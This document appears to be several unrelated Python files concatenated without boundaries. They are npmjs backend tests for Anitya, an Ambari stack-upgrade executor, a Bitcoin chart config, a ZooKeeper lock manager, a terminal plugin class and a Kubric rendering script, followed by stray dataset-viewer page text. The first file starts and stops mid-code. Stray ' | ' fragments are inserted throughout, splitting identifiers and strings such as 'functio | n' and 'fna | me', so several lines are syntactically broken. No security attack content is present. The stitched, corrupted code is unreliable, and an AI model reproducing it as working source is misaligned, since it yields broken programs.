create_distro(self.session)
self.create_project()
def create_project(self):
"""Create some basic projects to work with."""
project = models.Project(
name="request",
homepage="https://www.npmjs.org/package/request",
backend=BACKEND,
)
self.session.add(project)
self.session.commit()
project = models.Project(
name="non-existent-package-that-does-not-exist",
homepage="https://www.npmjs.org/package/non-existent-package-that-does-not-exist",
backend=BACKEND,
)
self.session.add(project)
self.session.commit()
project = models.Project(
name="colors",
homepage="https://www.npmjs.org/package/colors",
backend=BACKEND,
)
self.session.add(project)
self.session.commit()
def test_get_version(self):
"""Test the get_version functio | n of the npmjs backend."""
pid = 1
project = models.Project.get(self.session, pid)
exp = "2.83.0"
obs = backend.NpmjsBackend.get_version(project)
self.assertEqual(obs, exp)
pid = 2
project = models.Project.get(self.session, pid)
self.assertRaises(
AnityaPluginException, backend.NpmjsBackend.get_version, project
)
pid = 3
project = models.Project.get(self.session, pid)
exp = "1.2.0"
| obs = backend.NpmjsBackend.get_version(project)
self.assertEqual(obs, exp)
def test_get_version_url(self):
"""
Assert that correct url is returned.
"""
project = models.Project(
name="test", homepage="https://example.org", backend=BACKEND
)
exp = "https://registry.npmjs.org/test"
obs = backend.NpmjsBackend.get_version_url(project)
self.assertEqual(obs, exp)
def test_get_version_not_modified(self):
"""Assert that not modified response is handled correctly"""
pid = 1
project = models.Project.get(self.session, pid)
exp_url = "https://registry.npmjs.org/request"
with mock.patch("anitya.lib.backends.BaseBackend.call_url") as m_call:
m_call.return_value = mock.Mock(status_code=304)
versions = backend.NpmjsBackend.get_version(project)
m_call.assert_called_with(exp_url, last_change=None)
self.assertEqual(versions, None)
def test_get_versions(self):
"""Test the get_versions function of the npmjs backend."""
pid = 1
project = models.Project.get(self.session, pid)
exp = [
"0.8.3",
"0.9.0",
"0.9.1",
"0.9.5",
"0.10.0",
"1.0.0",
"1.1.0",
"1.1.1",
"1.2.0",
"1.9.0",
"1.9.1",
"1.9.2",
"1.9.3",
"1.9.5",
"1.9.7",
"1.9.8",
"1.9.9",
"2.0.0",
"2.0.1",
"2.0.2",
"2.0.3",
"2.0.4",
"2.0.5",
"2.1.0",
"2.1.1",
"2.2.0",
"2.2.5",
"2.2.6",
"2.2.9",
"2.9.0",
"2.9.1",
"2.9.2",
"2.9.3",
"2.9.100",
"2.9.150",
"2.9.151",
"2.9.152",
"2.9.153",
"2.9.200",
"2.9.201",
"2.9.202",
"2.9.203",
"2.10.0",
"2.11.0",
"2.11.1",
"2.11.2",
"2.11.3",
"2.11.4",
"2.12.0",
"2.14.0",
"2.16.0",
"2.16.2",
"2.16.4",
"2.16.6",
"2.18.0",
"2.19.0",
"2.20.0",
"2.21.0",
"2.22.0",
"2.23.0",
"2.24.0",
"2.25.0",
"2.26.0",
"2.27.0",
"2.28.0",
"2.29.0",
"2.30.0",
"2.31.0",
"2.32.0",
"2.33.0",
"2.34.0",
"2.35.0",
"2.36.0",
"2.37.0",
"2.38.0",
"2.39.0",
"2.40.0",
"2.41.0",
"2.42.0",
"2.43.0",
"2.44.0",
"2.45.0",
"2.46.0",
"2.47.0",
"2.48.0",
"2.49.0",
"2.50.0",
"2.51.0",
"2.52.0",
"2.53.0",
"2.54.0",
"2.55.0",
"2.56.0",
"2.57.0",
"2.58.0",
"2.59.0",
"2.60.0",
"2.61.0",
"2.62.0",
"2.63.0",
"2.64.0",
"2.65.0",
"2.66.0",
"2.67.0",
"2.68.0",
"2.69.0",
"2.70.0",
"2.71.0",
"2.72.0",
"2.73.0",
"2.74.0",
"2.75.0",
"2.76.0",
"2.77.0",
"2.78.0",
"2.79.0",
"2.80.0",
"2.81.0",
"2.82.0",
"2.83.0",
]
obs = backend.NpmjsBackend.get_ordered_versions(project)
self.assertEqual(obs, exp)
pid = 2
project = models.Project.get(self.session, pid)
self.assertRaises(
AnityaPluginException, backend.NpmjsBackend.get_versions, project
)
pid = 3
project = models.Project.get(self.session, pid)
exp = [
"0.3.0",
"0.5.0",
"0.5.1",
"0.6.0",
"0.6.0-1",
"0.6.1",
"0.6.2",
"1.0.0",
"1.0.1",
"1.0.2",
"1.0.3",
"1.1.0",
"1.1.1",
"1.1.2",
"1.2.0-rc0",
"1.2.0",
]
obs = backend.NpmjsBackend.get_ordered_versions(project)
self.assertEqual(obs, exp)
def test_get_versions_not_modified(self):
"""Assert that not modified response is handled correctly"""
pid = 1
project = models.Project.get(self.session, pid)
exp_url = "https://registry.npmjs.org/request"
with mock.patch("anitya.lib.backends.BaseBackend.call_url") as m_call:
m_call.return_value = mock.Mock(status_code=304)
versions = backend.NpmjsBackend.get_versions(project)
m_call.assert_called_with(exp_url, last_change=None)
self.assertEqual(versions, [])
def test_npmjs_check_feed(self):
"""Test the check_feed method of the npmjs backend."""
generator = backend.NpmjsBackend.check_feed()
items = sorted(generator)
self.assertEqual(
items[0],
(
"2d-density",
"https://github.com/nilestanner/2d-density#readme",
"npmjs",
"1.0.0",
),
)
self.assertEqual(
items[1],
(
"2d-density",
"https://github.com/nilestanner/2d-density#readme",
"npmjs",
"1.0.1",
),
)
self.assertEqual(
items[2],
|
#!/usr/bin/env python2.6
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import json
import os.path
import logging
import pprint
import re
from Grep import Grep
from StackVersionsFileHandler import StackVersionsFileHandler
logger = logging.getLogger()
grep = Grep()
class UpgradeExecutor:
""" Class that performs the StackVersion stack upgrade"""
SCRIPT_DIRS = [
'pre-upgrade.d',
'upgrade.d',
'post-upgrade.d'
]
NAME_PARSING_FAILED_CODE = 999
def __init__(self, pythonExecutor, puppetExecutor, config):
self.pythonExecutor = pythonExecutor
self.puppetExecutor = puppetExecutor
self.stacksDir = config.get('stack', 'upgradeScriptsDir')
self.config = config
versionsFileDir = config.get('agent', 'prefix')
self.versionsHandler = StackVersionsFileHandler(versionsFileDir)
def perform_stack_upgrade(self, command, tmpout, tmperr):
logger.info("Performing stack upgrade")
params = command['commandParams']
srcStack = params['source_stack_version']
tgtStack = params['target_stack_version']
component = command['role']
srcStackTuple = self.split_stack_version(srcStack)
tgtStackTuple = self.split_stack_version(tgtStack)
if srcStackTuple is None or tgtStackTuple is None:
errorstr = "Source (%s) or target (%s) version does not match pattern \
<Name>-<Version>" % (srcStack, tgtStack)
logger.info(errorstr)
result = {
'exitcode' : 1,
'stdout' : 'None',
'stderr | ' : errorstr
}
elif srcStack != tgtStack:
paramTuple = sum((srcStackTuple, tgtStackTuple), ())
upgradeId = "%s-%s.%s_%s-%s.%s" % paramTuple
# Check stack version (do we need upgrade?)
basedir = os.path.join(self.stacksDir, upgradeId, component)
if not os.path.isdir(basedir):
errorstr = "Upgrade %s is not supported (dir %s does not exist)" \
% (upgradeId, basedir)
logger.error(errorstr)
result = {
' | exitcode' : 1,
'stdout' : errorstr,
'stderr' : errorstr
}
else:
result = {
'exitcode' : 0,
'stdout' : '',
'stderr' : ''
}
# Request repos update (will be executed once before running any pp file)
self.puppetExecutor.discardInstalledRepos()
for dir in self.SCRIPT_DIRS:
if result['exitcode'] != 0:
break
tmpRes = self.execute_dir(command, basedir, dir, tmpout, tmperr)
result = {
'exitcode' : result['exitcode'] or tmpRes['exitcode'],
'stdout' : "%s\n%s" % (result['stdout'], tmpRes['stdout']),
'stderr' : "%s\n%s" % (result['stderr'], tmpRes['stderr']),
}
if result['exitcode'] == 0:
logger.info("Upgrade %s successfully finished" % upgradeId)
self.versionsHandler.write_stack_version(component, tgtStack)
else:
infostr = "target_stack_version (%s) matches current stack version" \
" for component %s, nothing to do" % (tgtStack, component)
logger.info(infostr)
result = {
'exitcode' : 0,
'stdout' : infostr,
'stderr' : 'None'
}
result = {
'exitcode' : result['exitcode'],
'stdout' : grep.tail(result['stdout'], grep.OUTPUT_LAST_LINES),
'stderr' : grep.tail(result['stderr'], grep.OUTPUT_LAST_LINES)
}
return result
def get_key_func(self, name):
"""
Returns a number from filenames like 70-foobar.* or 999 for not matching
filenames
"""
parts = name.split('-', 1)
if not parts or not parts[0].isdigit():
logger.warn("Can't parse script filename number %s" % name)
return self.NAME_PARSING_FAILED_CODE # unknown element will be placed to the end of list
return int(parts[0])
def split_stack_version(self, verstr):
verdict = json.loads(verstr)
stack_name = verdict["stackName"].strip()
matchObj = re.match( r'(\d+).(\d+)', verdict["stackVersion"].strip(), re.M|re.I)
if matchObj:
stack_major_ver = matchObj.group(1)
stack_minor_ver = matchObj.group(2)
return stack_name, stack_major_ver, stack_minor_ver
else:
return None
def execute_dir(self, command, basedir, dir, tmpout, tmperr):
"""
Executes *.py and *.pp files located in a given directory.
Files a executed in a numeric sorting order.
"""
dirpath = os.path.join(basedir, dir)
logger.info("Executing %s" % dirpath)
if not os.path.isdir(dirpath):
warnstr = "Script directory %s does not exist, skipping" % dirpath
logger.warn(warnstr)
result = {
'exitcode' : 0,
'stdout' : warnstr,
'stderr' : 'None'
}
return result
fileList=os.listdir(dirpath)
fileList.sort(key = self.get_key_func)
formattedResult = {
'exitcode' : 0,
'stdout' : '',
'stderr' : ''
}
for filename in fileList:
prevcode = formattedResult['exitcode']
if prevcode != 0 or self.get_key_func(filename) == self.NAME_PARSING_FAILED_CODE:
break
filepath = os.path.join(dirpath, filename)
if filename.endswith(".pp"):
logger.info("Running puppet file %s" % filepath)
result = self.puppetExecutor.run_manifest(command, filepath,
tmpout, tmperr)
elif filename.endswith(".py"):
logger.info("Running python file %s" % filepath)
result = self.pythonExecutor.run_file(command, filepath, tmpout, tmperr)
elif filename.endswith(".pyc"):
pass # skipping compiled files
else:
warnstr = "Unrecognized file type, skipping: %s" % filepath
logger.warn(warnstr)
result = {
'exitcode' : 0,
'stdout' : warnstr,
'stderr' : 'None'
}
formattedResult = {
'exitcode' : prevcode or result['exitcode'],
'stdout' : "%s\n%s" % (formattedResult['stdout'], result['stdout']),
'stderr' : "%s\n%s" % (formattedResult['stderr'], result['stderr']),
}
logger.debug("Result of %s: \n %s" % (dirpath, pprint.pformat(formattedResult)))
return formattedResult
|
from datetime import date
NTESTS = 1
PREV_DAYS = 10
PERCENT_UP = 0.01
PERCENT_DOWN = 0.01
PERIOD = 'Hourly' # [5-min, 15-min, | 30-min, Hourly, 2-hour, 6-hour, 12-hour, Daily, Weekly]
MARKET = 'bitstampUSD'
# DATE ST | ART
YEAR_START = 2011
MONTH_START = 9
DAY_START = 13
DATE_START = date(YEAR_START, MONTH_START, DAY_START)
# DATE END
DATE_END = date.today()
URL_DATA_BASE = 'http://bitcoincharts.com/charts/chart.json?'
|
from contextlib import contextmanager
import logging
import os.path
import traceback
from kazoo.client import KazooClient
from kazoo.exceptions import (
LockTimeout,
NodeExistsError,
NoNodeError,
KazooException,
ZookeeperError,
)
from kazoo.retry import KazooRetry, RetryFailedError
from mastermind.utils.queue import LockingQueue
from mastermind_core import helpers
import msgpack
# from errors import ConnectionError, InvalidDataError
from lock import Lock
from sync.error import LockError, LockFailedError, LockAlreadyAcquiredError, InconsistentLockError
logger = logging.getLogger('mm')
kazoo_logger = logging.getLogger('kazoo')
kazoo_logger.propagate = False
[kazoo_logger.addHandler(h) for h in logger.handlers]
kazoo_logger.setLevel(logging.INFO)
class ZkSyncManager(object):
RETRIES = 2
LOCK_TIMEOUT = 3
def __init__(self, host='127.0.0.1:2181', lock_path_prefix='/mastermind/locks/'):
self.client = KazooClient(host, timeout=3)
logger.info('Connecting to zookeeper host {}, lock_path_prefix: {}'.format(
host, lock_path_prefix))
try:
self.client.start()
except Exception as e:
logger.error(e)
raise
self._retry = KazooRetry(max_tries=self.RETRIES)
self.lock_path_prefix = helpers.encode(lock_path_prefix)
@contextmanager
def lock(self, lockid, blocking=True, timeout=LOCK_TIMEOUT):
lock = Lock(self.client, self.lock_path_prefix + lockid)
try:
acquired = lock.acquire(blocking=blocking, timeout=timeout)
logger.debug('Lock {0} acquired: {1}'.format(lockid, acquired))
if not acquired:
# TODO: Change exception time or set all required parameters for
# this type of exception
raise LockAlreadyAcquiredError(lock_id=lockid)
yield
except LockTimeout:
logger.info('Failed to acquire lock {} due to timeout ({} seconds)'.format(
lockid, timeout))
raise LockFailedError(lock_id=lockid)
except LockAlreadyAcquiredError:
raise
except LockError as e:
logger.error('Failed to acquire lock {0}: {1}\n{2}'.format(
lockid, e, traceback.format_exc()))
raise
finally:
lock.release()
def persistent_locks_acquire(self, locks, data=''):
try:
retry = self._retry.copy()
result = retry(self._inner_persistent_locks_acquire, locks=locks, data=data)
except RetryFailedError:
raise LockError('Failed to acquire persistent locks {} after several retries'.format(
locks))
except KazooException as e:
logger.error('Failed to fetch persistent locks {0}: {1}\n{2}'.format(
locks, e, traceback.format_exc()))
raise LockError
return result
def _inner_persistent_locks_acquire(self, locks, data):
ensured_paths = set()
tr = self.client.transaction()
for lockid in locks:
path = self.lock_path_prefix + lockid
parts = path.rsplit('/', 1)
if len(parts) == 2 and parts[0] not in ensured_paths:
self.client.ensure_path(parts[0])
ensured_paths.add(parts[0])
tr.create(path, data)
failed = False
failed_locks = []
result = tr.commit()
for i, res in enumerate(result):
if isinstance(res, ZookeeperError):
failed = True
if isinstance(res, NodeExistsError):
failed_locks.append(locks[i])
if failed_locks:
holders = []
for f in failed_locks:
# TODO: fetch all holders with 1 transaction request
holders.append((f, self.client.get(self.lock_path_prefix + f)))
foreign_holders = [(l, h) for l, h in holders if h[0] != data]
failed_lock, holder_resp = foreign_holders and foreign_holders[0] or holders[0]
holder = holder_resp[0]
holders_ids = list(set(h[0] for _, h in holders))
logger.warn('Persistent lock {0} is already set by {1}'.format(failed_lock, holder))
raise LockAlreadyAcquiredError(
'Lock for {0} is already acquired by job {1}'.format(failed_lock, holder),
lock_id=failed_lock, holder_id=holder,
lock_ids=failed_locks, holders_ids=holders_ids)
elif failed:
logger.error('Failed to set persistent locks {0}, result: {1}'.format(
locks, result))
raise LockError
return True
def get_children_locks(self, lock_prefix):
try:
retry = self._retry.copy()
result = retry(self.__inner_get_children_locks, lock_prefix)
except RetryFailedError:
raise LockError('Failed to get fetch children locks for {}'.format(
lock_prefix))
return result
def __inner_get_children_locks(self, lock_prefix):
full_path = self.lock_path_prefix + lock_prefix
self.client.ensure_path(os.path.normpath(full_path))
result = self.client.get_children(full_path)
return ['{0}{1}'.format(lock_prefix, lock) for lock in result]
def persistent_locks_release(self, locks, check=''):
try:
retry = self._retry.copy()
result = retry(self.__inner_persistent_locks_release, locks=locks, check=check)
except RetryFailedError:
raise LockError(
'Failed to release persistent locks {} after several retries'.format(locks)
)
except KazooException as e:
logger.error('Failed to remove persistent locks {0}: {1}\n{2}'.format(
locks, e, traceback.format_exc()))
raise LockError
return result
def __inner_persistent_locks_release(self, locks, check):
for lockid in locks:
try:
if check:
data = self.client.get(self.lock_path_prefix + lockid)
if data[0] != check:
logger.error(
'Lock {lock_id} has inconsistent data: {current_data}, '
'expected {expected_data}'.format(
lock_id=lockid,
current_data=data[0],
expected_data=check,
)
)
raise InconsistentLockError(lock_id=lockid, holder_id=data[0])
self.client.delete(self.lock_path_prefix + lockid)
except NoNodeError:
logger.warn('Persistent lock {0} is already removed'.format(lockid))
pass
return True
class ZkCacheTaskManager(object):
RETRIES = 2
def __init__(self, | host='127.0.0.1:2181', lock_path_prefix='/mastermind/cache/'):
self.client = KazooClient(host, timeout=3)
logger.info('Connecting to zookeeper host {}, lock_path_prefix: {}'.format(
host, lock_path_prefix))
try:
self.client.start()
except Exception as e:
logger.error(e)
raise
self.lock_path_prefix = helpers.encode(lock_path_prefix)
def put_task(self, task):
group_id = task['group']
| q = LockingQueue(self.client, self.lock_path_prefix, group_id)
return q.put(self._serialize(task))
def put_all(self, tasks):
for task in tasks:
self.put_task(task)
def list(self):
for group_id in self.client.retry(self.client.get_children, self.lock_path_prefix):
for item in LockingQueue(self.client, self.lock_path_prefix, group_id).list():
yield self._unserialize(item)
@staticmethod
def _serialize(task):
return msgpack.packb(task)
@staticmethod
def _unserialize(task):
return msgpack.unpackb(task)
|
class PluginBase(object):
name = ''
doc = 'doc about this class'
methods_subclass = {}
def __init__(self, **kwargs):
self.methods = {
'help': 'doc about help method',
'get_methods': 'doc about get_methods method'
}
self.methods.update(self.methods_subclass)
def on_import(self, term_system):
pass
def get_methods(self):
return [key for key in self.methods]
def help(self, method_name):
doc = self.methods.get(method_name[0], None)
if doc:
ret = doc
else:
ret = '# %s: %s: %s not found' % (
self.name, 'help', method_name)
return ret
@staticmethod
def get_args_kwargs_from_text(text):
start_str = (None, -1)
strings_found = []
kwargs_found = {}
args_found = []
for i, char in enumerate(text):
if char in ("'", '"'):
if start_str[0]:
if char == start_str[0]:
rev = text[:i+1][::-1]
b = rev[i+1 - start_str[1]:].find(' ')
if b != -1:
strings_found.append((start_str[1] - b, i+1))
else:
strings_found.append((start_str[1], i+1))
start_str = (None, -1)
else:
start_str = (char, i)
if strings_found:
last_end = 0
for start, end in strings_found:
before = text[last_end:start]
for x in before.split(' '):
if x:
args_found.append(x)
args_found.append(text[start:end])
last_end = end
for x in text[end:].split(' '):
if x:
args_found.append(x)
else:
args_found = text.split(' ')
remlist = []
for i, x in enumerate(args_found):
a = x.find('=')
if a != -1:
yes = False
c = x.find("'")
b = x.find('"')
if b == -1 and c == -1:
yes = True
else:
start = b
if c != -1 and c < b:
start = c
a = x[:start].find('=')
if a != -1:
yes = True
if yes:
kwargs_found[x[:a]] = x[a+1:]
remlist.append(i)
for x in reversed(remlist):
del args_found[x]
return args_found, kwargs_found
@staticmethod
def get_from_locals_globals(term_system, text):
ret = term_system.exec_locals.get(text, None)
if not ret:
ret = term_system.get_globals().get(text, None)
return ret
@staticmethod
def slice_fname(text):
fname = ''
text2 = ''
args = ''
if text:
b = text.find(' ')
if b != -1:
text2 = text[b+1:]
fna | me | = text[:b]
else:
fname = text
return fname, text2
@staticmethod
def get_method_args(text):
fname = ''
method = ''
args = []
if text:
aspl = text.split(' ')
fname = aspl[0]
if len(aspl) > 1:
method = aspl[1]
if len(aspl) > 2:
args = aspl[2:]
return fname, method, tuple(args)
@staticmethod
def get_method_args_kwargs(text):
fname, method, args, kwargs = '', '', [], {}
if text:
aspl = text.split(' ')
fname = aspl[0]
if len(aspl) > 1:
method = aspl[1]
if len(aspl) > 2:
args, kwargs = PluginBase.get_args_kwargs_from_text(
' '.join(aspl[2:]))
return fname, method, tuple(args), kwargs
def handle_input(self, term_system, term_globals, exec_locals, text):
fname, method, args, kwargs = self.get_method_args_kwargs(text)
found = False
if method in self.methods:
m = getattr(self, method, None)
if m:
found = True
if args and kwargs:
result = m(*args, **kwargs)
elif args:
result = m(*args)
elif kwargs:
result = m(**kwargs)
else:
result = m()
if not found:
result = (
'# %s: Method "%s" not found\n'
'# Available methods are %s\n'
'# Type "help [method_name]" for help') % (
self.name, method, self.get_methods())
return result
|
# Copyright 2022 The Kubric Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import numpy as np
import kubric as kb
from kubric.renderer import Blender
# TODO: go to https://shapenet.org/ create an account and agree to the terms
# then find the URL for the kubric preprocessed ShapeNet and put it here:
SHAPENET_PATH = "gs://KUBRIC_SHAPENET_PATH/ShapeNetCore.v2.json"
if SHAPENET_PATH == "gs://KUBRIC_SHAPENET_PATH/ShapeNetCore.v2.json":
raise ValueError("Wrong ShapeNet path. Please visit https://shapenet.org/ "
"agree to terms and conditions, and find the correct path.")
# --- CLI arguments
parser = kb.ArgumentParser()
parser.set_defaults(
frame_end=5,
resolution=(512, 512),
)
FLAGS = parser.parse_args()
# --- Common setups & resources
scene, rng, output_dir, scratch_dir = kb.setup(FLAGS)
renderer = Blender(scene, scratch_dir,
samples_per_pixel=64,
background_transparency=True)
shapenet = kb.AssetSource.from_manifest(SHAPENET_PATH)
# --- Add Klevr-like lights to the scene
scene += kb.assets.utils.get_clevr_lights(rng=rng)
scene.ambient_illumination = kb.Color(0.05, 0.05, 0.05)
# --- Add shadow-catcher floor
floor = kb.Cube(name="floor", scale=(100, 100, 1), position=(0, 0, -1))
scene += floor
# Make the floor transparent except for catching shadows
# Together with background_transparency=True (above) this results in
# the background being transparent except for the object shadows.
floor.linked_objects[renderer].cycles.is_shadow_catcher = True
# --- Keyframe the camera
scene.camera = kb.PerspectiveCamera()
for frame in range(FLAGS.frame_start, FLAGS.frame_end + 1):
scene.camera.position = kb.sample_point_in_half_sphere_shell(1.5, 1.7, 0.1)
scene.camera.look_at((0, 0, 0))
scene.camera.keyframe_insert("position", frame)
scene.camera.keyframe_insert("quaternion", frame)
# --- Fetch a random (airplane) asset
airplane_ids = [name for name, spec in shapenet._assets.items()
if spec["metadata"]["category"] == "airplane"]
asset_id = rng.choice(airplane_ids) #< e.g. 02691156_10155655850468db78d106ce0a280f87
obj = shapenet.create(asset_id=asset_id)
logging.info(f"selected '{asset_id}'")
# --- make object flat on X/Y and not penetrate floor
obj.quaternion = kb.Quaternion(axis=[1, 0, 0], degrees=90)
obj.position = obj.position - (0, 0, obj.aabbox[0][2])
scene.add(obj)
# --- Rendering
logging.info("Rendering the scene ...")
renderer.save_state(output_dir / "scene.blend")
data_stack = renderer.render()
# --- Postprocessing
kb.compute_visibility(data_stack["segmentation"], scene.assets)
da | ta_stack["segmentation"] = kb.adjust_segmentation_idxs(
da | ta_stack["segmentation"],
scene.assets,
[obj]).astype(np.uint8)
kb.file_io.write_rgba_batch(data_stack["rgba"], output_dir)
kb.file_io.write_depth_batch(data_stack["depth"], output_dir)
kb.file_io.write_segmentation_batch(data_stack["segmentation"], output_dir)
# --- Collect metadata
logging.info("Collecting and storing metadata for each object.")
data = {
"metadata": kb.get_scene_metadata(scene),
"camera": kb.get_camera_info(scene.camera),
"object": kb.get_instance_info(scene, [obj])
}
kb.file_io.write_json(filename=output_dir / "metadata.json", data=data)
kb.done()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.